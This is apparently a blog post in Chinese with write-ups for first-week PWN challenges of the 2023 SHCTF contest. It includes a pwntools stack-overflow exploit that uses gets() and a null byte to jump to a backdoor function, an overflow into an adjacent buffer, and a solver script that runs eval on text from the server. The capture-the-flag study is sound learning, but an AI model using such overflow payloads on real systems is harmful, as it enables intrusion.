首页 > 其他分享 >2023 SHCTF-校外赛道 PWN WP

2023 SHCTF-校外赛道 PWN WP

时间:2023-10-30 21:56:10浏览次数:44  
标签:赛道 recvline SHCTF backdoor sh ls WP print flag2

WEEK1

nc

连接靶机直接梭

hard nc

同样是nc直接连,但是出题人利用linux命令的特性,将部分flag放在了特殊文件中

利用ls -a查看所有文件,查看.gift,可以得到前半段

然后再ls gift2以及cat相关的内容得不到任何数据。。。因此考虑到会不会是进入目录下找,再更换到gift2目录中,查看flag2,可以得到一串base64

cd gift2
ls
flag2
cat flag2
ZTQtYTMyNi1jOThjYzJjZmRkYzh9Cg==

口算题

要答对200题才行,肯定得用脚本。。。。

exp:

from pwn import *
host = ''
post = 
GeShi = b'Press Enter to start...'  # 改格式!

sh = remote(host,post)
sh.sendline("")

data = sh.recvuntil(GeShi).decode()

for i in range(200):
    data1 = sh.recvuntil(b'=').decode()
    print(data1)

    a = data1.split("\n")[-1].split('=')[0]
    print("a:",a)
    if "÷" in a:
        a = a.replace("÷","/")
    if "×" in a:
        a = a.replace("×","*")
    print(eval(a))
    sh.sendline(str(eval(a)).encode())
    print(sh.recvline())
    print(sh.recvline())
    print(sh.recvline())
print(sh.recvall())

showshowway

题目要求yp相等,寻找一下py,发现p = showshowway

y是一个大小为32的字符数组

往上划发现,传入的值存在s中,地址从06010C0截至到06010FF,长度为64(测试过了一个字符a占地址为1),而y的地址紧接着s,说明我们传入的第65个值会存入y

所以我们只要输入64个a+showshowway,即可让yp相等。。。。

四则计算器

IDA发现有后面函数backdoor()

查看backdoor()的地址为0x4015E4

利用gets()函数不检查输入函数,所以存在栈溢出漏洞,再利用strlen()会被\x00截断

构造pyload:

from pwn import *
context(os='linux',arch='amd64',log_level= 'debug')

sh = remote("IP",端口号)
backdoor = 0x4015E4
pad = 0x32 + 8
payload = b'\x00' + b'A'*(pad-1) + p64(backdoor)

sh.sendline(payload)
sh.interactive()

 

标签:赛道,recvline,SHCTF,backdoor,sh,ls,WP,print,flag2
From: https://www.cnblogs.com/mumuhhh/p/17798949.html

相关文章

  • SHCTF(山河)赛事部分Write up-白猫
    SHCTF(山河)赛事部分Writeup-白猫MISC[WEEK1]签到题下载题目并打开:base128编码:Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5因为是base128编码,所以通过两次base64解码,即可得出flag爆出flag:flag{this_is_flag}**总结: **这道签到题主要考察了对base64编码的基础了解[WEEK1]Steganography下载题......
  • wpf prism 自定义委托命令DelegateCommand
    //构造函数publicMainWindowViewModel(){EditCommand=newDelegateCommand(_editCommand);}//命令声明一publicDelegateCommandEditCommand{get;set;}//构造函数中实例化委托void_editCommand(){MessageBox.Show("EditCommand");}//命令生命......
  • NewStarCTF 2023 公开赛道 WEEK4|MISC 部分WP
    R通大残1、题目信息R通大残,打了99,补!2、解题方法仔细分析题目,联想到隐写的R通道。首先解释一下:R是储存红色的通道,通道里常见有R(红)、G(绿)、B(蓝)三个通道,如果关闭了R通道图片就没有红色的部分,G、B同理。因此我们想到R大残应该是不显示红色了,猜测结果就在R通道里,所以使用Stegsolv......
  • CTFshow Reverse 数学不及格 wp
    1.elf文件使用IDA反汇编main函数,主要逻辑写在注释里,要算出除程序名之外的4个参数2.根据伪代码分析数据前三个check相加,有(v9-v10)+(v9-v11)+(v9-v12)=3*v9-(v10+v11+v12)=0x233F0E151C+0x1B45F81A32+0x244C071725=0x62d10d4673而check4v4+v10+v11+v12=0x13A31412F8C两个等......
  • NOIP2018 赛道修建
    观察题目不难想到二分答案。考虑二分所有赛道的最小长度值,那么我们可以去判断最后修建出来的赛道数是不是大于等于\(m\)条即可。用\(f_{i}\)表示当前以\(i\)为根,最长的未被赛道占用的链的长度。但是有很多链,匹配的过程不好进行,所以改为用multiset来维护当前点的链有多......
  • WPF 触发器
    触发器WPF的Trigger是一种用于定义和管理XAML资源的触发器,它可以根据不同的条件或事件来改变控件的属性或行为。以下是触发器的类型基本触发器(Trigger):这种触发器是根据控件自身的依赖属性的值来触发的,例如,当鼠标移动到按钮上时,改变按钮的背景色数据触发器(DataTrigger)......
  • 【pwn】[SWPUCTF 2021 新生赛]nc签到 --shell过滤字符
    附件下载打开:importosart='''  (( "####@@!!$$  ))    `#####@@!$$` ))  (( '####@!!$:  (( ,####@!!$: ))    .###@!!$:    `##@@!$:    `#@!!$ !@#  `#@!$:   @#$  #$  `#@!$:   !@!......
  • WPF 控件模板
    控件模板WPF的ControlTemplate是一种用于定义和自定义控件的外观和结构的模板,它可以完全替换控件的默认模板,实现个性化和复杂的效果。WPF的ControlTemplate有以下几个特点:ControlTemplate是一个XAML元素,它可以包含任何类型的UI元素,如布局、形状、图像、文本等,这些元素......
  • 2023年SWPU NSS 秋季招新赛 (校外赛道) MISC复盘WP
    GIFCode题目描述:扫一扫即可获取Flag给了一个含二维码的动图,分离一下得到九张二维码碎片,根据文件名数字按顺序组装,在线扫码即可NSSCTF{3f0ac91b-3e0e-a7e2-7b2a-c67cfdc093fe}相信他终将回来题目描述:我们的湾湾hint1:base怎么就不能转成16进制呢010查看,base64转图片但......
  • CTFshow Reverse 红包题 武穆遗书 wp
    1.查看文件信息,是32位exe文件有upx壳2.脱壳后使用32位IDA打开,分析伪代码有反调试,但是check很简单,直接比较输入和变换后的内容3.通过attach来过反调试如下图设置断点,运行exe后先不输入,ida的Debugger->Attachtoprocess,选择正在等待输入的exeattach后,在exe黑窗中任意输入,......